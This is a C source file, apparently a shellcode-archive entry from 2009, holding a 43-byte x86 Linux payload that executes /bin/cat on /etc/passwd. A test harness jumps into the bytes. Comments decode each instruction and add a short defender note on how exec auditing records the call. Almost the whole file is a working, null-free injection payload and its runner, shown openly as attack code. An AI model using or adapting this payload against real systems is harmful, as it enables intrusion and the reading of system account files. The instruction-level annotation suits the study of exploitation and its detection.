break a time, with break the c0de…

/bin/cat /etc/passwd 43 bytes x86 linux


/*
Title  : /bin/cat /etc/passwd 43 bytes x86 linux
Name   : 43 bytes sys_execve("/bin/cat","/etc/passwd") x86 linux shellcode
Date   : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

#include <stdio.h>
#include <string.h>

/*
 * 43-byte x86 (32-bit) Linux payload, stored as a C string literal.
 *
 * What the bytes do: build two NUL-terminated strings and an argument
 * vector on the stack, then invoke system call 0x0b (execve on 32-bit
 * x86 Linux) through int 0x80 with
 *     ebx -> "/bin/cat"
 *     ecx -> { "/bin/cat", "/etc//passwd", NULL }
 *     edx =  0 (NULL envp)
 * The path is pushed as "/etc//passwd": the doubled slash pads it to
 * three 4-byte pushes, and the kernel resolves it as /etc/passwd.
 *
 * The sequence contains no 0x00 byte, which is why strlen() in main()
 * reports the full 43 bytes.
 *
 * Defender note: the observable effect is an execve of /bin/cat with
 * the argument "/etc//passwd" and an empty environment, issued by
 * whatever process ran these bytes; exec auditing records exactly that.
 */
char *shellcode=
		"\x31\xc0" 		// xor eax,eax          ; eax = 0
		"\xb0\x0b" 		// mov al,0x0b          ; eax = 11, the execve syscall number
		"\x99" 			// cdq                  ; edx = sign extension of eax = 0
		"\x52" 			// push edx             ; NUL terminator for the first string
		"\x68\x2f\x63\x61\x74" 	// push dword 0x7461632f ; "/cat"
		"\x68\x2f\x62\x69\x6e" 	// push dword 0x6e69622f ; "/bin"
		"\x89\xe3" 		// mov ebx,esp          ; ebx -> "/bin/cat"
		"\x52" 			// push edx             ; NUL terminator for the second string
		"\x68\x73\x73\x77\x64" 	// push dword 0x64777373 ; "sswd"
		"\x68\x2f\x2f\x70\x61" 	// push dword 0x61702f2f ; "//pa"
		"\x68\x2f\x65\x74\x63" 	// push dword 0x6374652f ; "/etc"
		"\x89\xe1" 		// mov ecx,esp          ; ecx -> "/etc//passwd"
		"\x52" 			// push edx             ; argv[2] = NULL
		"\x51" 			// push ecx             ; argv[1] = "/etc//passwd"
		"\x53" 			// push ebx             ; argv[0] = "/bin/cat"
		"\x89\xe1" 		// mov ecx,esp          ; ecx -> argv
		"\xcd\x80"; 		// int 0x80             ; enter the kernel

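/*
 * Test harness: print the payload length, then transfer control to the
 * payload bytes.
 *
 * Returns 0 only if the call into the payload returns, which it does not
 * when the execve inside it succeeds (the process image is replaced).
 */
int main(void)
{
	/* strlen() returns size_t, so the matching conversion is %zu, not %d. */
	fprintf(stdout, "Length: %zu\n", strlen(shellcode));

	/*
	 * Flush before the jump: a successful execve discards unwritten stdio
	 * buffers, so the length line would be lost when stdout is not a
	 * terminal.
	 */
	fflush(stdout);

	/*
	 * Reinterpret the data pointer as a function pointer and call it.
	 * The bytes live in a string literal, which is normally placed in
	 * read-only, non-executable memory; where the platform enforces
	 * non-executable data pages (NX/DEP) this call faults instead of
	 * running the payload.
	 */
	(*(void (*)()) shellcode)();

	return 0;
}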


/*
shellcode[]="\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" "\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/